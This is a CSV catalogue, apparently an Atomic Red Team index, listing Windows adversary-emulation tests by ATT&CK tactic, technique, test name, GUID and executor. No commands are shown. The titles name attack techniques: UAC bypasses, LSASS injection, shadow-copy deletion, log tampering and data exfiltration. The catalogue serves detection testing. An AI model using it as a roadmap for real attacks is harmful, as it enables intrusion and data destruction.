discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6db1f57f-d1d5-4223-8a66-55c9c65a9592,command_prompt
discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,3,Rundll32 execute VBscript command using Ordinal number,32d1cf1b-cbc2-4c09-8d05-07ec5c83a821,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,4,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,5,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,6,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,7,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,8,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,9,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,4,InstallUtil Install method call,9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,5,InstallUtil Uninstall method call - /U variant,34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,1,Copy and Delete Mailbox Data on Windows,d29f01ea-ac72-4efc-8a15-bea64b77fabf,powershell
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,4,Copy and Modify Mailbox Data on Windows,edddff85-fee0-499d-9501-7d4d2892e79b,powershell
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,6,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,9,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,10,Lolbin Gpscript logon option,5bcda9cd-8e85-48fa-861d-b5a85d91d48c,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup option,f8da74bb-21b8-4af9-8d84-f2c8e4a220e3,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,8,Windows - Timestomp a File,d7512c33-3a75-4806-9893-69abc3ccdd43,powershell
defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik@tz into memory,56b9589c-9170-4682-8c3d-33b86ecb5119,powershell
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Disable Windows IIS HTTP Logging via PowerShell,a957fb0f-1e85-49b2-a211-413366784b1e,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
